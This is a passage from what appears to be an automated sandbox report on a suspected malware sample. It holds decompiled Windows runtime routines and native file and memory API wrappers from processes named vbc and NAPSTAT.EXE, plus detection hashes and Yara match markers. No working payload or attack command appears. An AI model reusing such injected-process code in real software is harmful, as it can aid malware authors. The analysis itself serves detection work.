												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A25329(_t74, _t92);
													_push(1);
													_t48 = E00A253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00a253ab
0x00a253ae
0x00a253b1
0x00a253b4
0x00a253b7
0x00a405b6
0x00a405c0
0x00a405c3
0x00000000
0x00a405c9
0x00a405c9
0x00a405cc
0x00a405d5
0x00a405d5
0x00a253bd
0x00a253bd
0x00a253bd
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a62269
0x00a6226d
0x00a62349
0x00a6234d
0x00a62273
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623cb
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00a6228f
0x00000000
0x00a6226d
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00a253d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4

Strings

RTL: Re-Waiting, xrefs: 00A62328
RTL: Resource at %p, xrefs: 00A6230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00A2EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A1DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xae793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A016C0(_t39);
				} else {
					_t40 = E009FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A43915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xae793c; // 0x0
								_push(_t85);
								_t44 = E00A01F28(_t71);
							} else {
								_t44 = E009FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A43915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00A82306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A2EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A44FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A53F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A53F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xae20c0;
								if(_t85 != 0xae20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00A8217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A53F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00a2ec56
0x00a2ec56
0x00a2ec56
0x00a2ec5c
0x00a2ec64
0x00a623e6
0x00a623eb
0x00a623eb
0x00a2ec6a
0x00a2ec6c
0x00a2ec6f
0x00a623f3
0x00a623f8
0x00a623fa
0x00a623fc
0x00a2ec75
0x00a2ec76
0x00a2ec76
0x00a2ec7b
0x00a2ec7c
0x00a2ec7e
0x00a62406
0x00a62407
0x00a6240c
0x00a6240d
0x00a6240d
0x00a6240d
0x00a62414
0x00a62417
0x00a6241e
0x00a62435
0x00a62438
0x00a6243c
0x00a6243f
0x00a62442
0x00a62443
0x00a62446
0x00a62449
0x00a62453
0x00a62455
0x00a6245b
0x00a6245b
0x00a2eb99
0x00a2eb99
0x00a2eb9c
0x00a2eb9d
0x00a2eb9f
0x00a2eba2
0x00a62465
0x00a6246b
0x00a6246d
0x00a2eba8
0x00a2eba9
0x00a2eba9
0x00a2ebae
0x00a2ebb3
0x00a2ebb9
0x00a2ebbb
0x00a62513
0x00a62514
0x00a62519
0x00a6251b
0x00a2ec2a
0x00a2ec2d
0x00a2ec33
0x00a2ec36
0x00a2ec3a
0x00a2ec3e
0x00a2ec40
0x00a2ec47
0x00a2ec47
0x00a2ec40
0x00a022c6
0x00a2ebc1
0x00a2ebc1
0x00a2ebc5
0x00a2ec9a
0x00a2ec9a
0x00a2ebd6
0x00a2ebd6
0x00000000
0x00a2ebbb
0x00a62477
0x00a6247c
0x00a62486
0x00a6248b
0x00a62496
0x00a6249b
0x00a6249d
0x00a624a0
0x00a624a3
0x00a624aa
0x00a624aa
0x00a624a5
0x00a624a5
0x00a624a5
0x00a624ac
0x00a624af
0x00a624b0
0x00a624b3
0x00a624b9
0x00a624ba
0x00a624bb
0x00a624c6
0x00a624cb
0x00a624cd
0x00a624d0
0x00a624d1
0x00a624d4
0x00a624d6
0x00a624d9
0x00a624d9
0x00a624dc
0x00a624df
0x00a624e1
0x00a624e7
0x00a624e9
0x00a624ec
0x00a624ef
0x00a624f2
0x00a624f2
0x00a624ef
0x00a624e7
0x00a624fa
0x00a624ff
0x00a62501
0x00a62503
0x00a62506
0x00a6250b
0x00a2eb8c
0x00a2eb93
0x00000000
0x00000000
0x00a2eb93
0x00000000
0x00a2eb99
0x00a2ec85
0x00a2ec85
0x00a2ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A6248D
RTL: Re-Waiting, xrefs: 00A624FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A624BD

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction ID: 6973d9136ecc8518d511a44da7530a1c3dfa326f96904a4fd3d274cb99bad66e
Opcode Fuzzy Hash: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction Fuzzy Hash: 44411871600604ABDB20DBA8DD89FAA77B8EF84720F208615F5559B2C1D734ED818760

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00A3FD94

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: ec7cf41994a5f1220f04a7fae334367f5fa7f8fa50bc84eae926909f4ab92885
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: E1919E75E1021AEFDF28DF99C845AAEB7B4FF55309F30807AE401A71A2E7305A45CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NAPSTAT.EXE PID: 2244 Parent PID: 1388 NAPSTAT.EXECOMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	0%
Total number of Nodes:	368
Total number of Limit Nodes:	53

Executed Functions

Function 00099E0A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55

Strings

MK, xrefs: 00099E7C, 00099E84

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: MK
API String ID: 2738559852-3981634027
Opcode ID: 44faec794a8b76a315eb6b4480c10772e5011168cc6a1ee96a432cb111d9d9ec
Instruction ID: 2eaa0b067b353e1c38c99c3fefbe5c42eb98a48383ce28c9fa1574906d07e515
Opcode Fuzzy Hash: 44faec794a8b76a315eb6b4480c10772e5011168cc6a1ee96a432cb111d9d9ec
Instruction Fuzzy Hash: 6F0129B2200208ABCB14DF98CC85EEB77ADEF8C750F058649BA1DA7241D630E9108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00099D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD

Strings

.z`, xrefs: 00099D9D, 00099DA8

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: d9693f5735e140e5c8b9927c3ecdb4203fd1629cceff1cc384eb55b5321f309e
Instruction ID: f954e998833ea3061ca872b81c82a864745115a5f7dbe2084068b9fc8ffd4cfb
Opcode Fuzzy Hash: d9693f5735e140e5c8b9927c3ecdb4203fd1629cceff1cc384eb55b5321f309e
Instruction Fuzzy Hash: E801B2B2254208AFCB08DF98DC95EEB37E9BF8C754F158248FA4D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD

Strings

.z`, xrefs: 00099D9D, 00099DA8

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 63cb80dc364295cf340fb5e817a82d429ee0f25d7d9631c0e925bfb349143eeb
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B8F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00099E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5

Strings

M, xrefs: 00099EAC, 00099EB4

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 38dda25029afe3172f76972a2fe7647abf86c968db1867b573677de5ec081c4c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 06D012752002146BD710EB98CC85ED7775CEF44750F154455BA585B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E10, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c1dbbdede6ca734d3b6ae3ff421215ba9194ca1b8af34a3d35a52b2938fa7461
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 38F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 7f7d3c63fc8a91ffcb1dfd4a579ead8bd4f3f7c587b654bacbd3ae9f6f840db4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 57F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE08A7241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01F200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F200CF

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 01F207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F207B7

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 01F1F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1F9FB

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 01F1F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1F90E

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
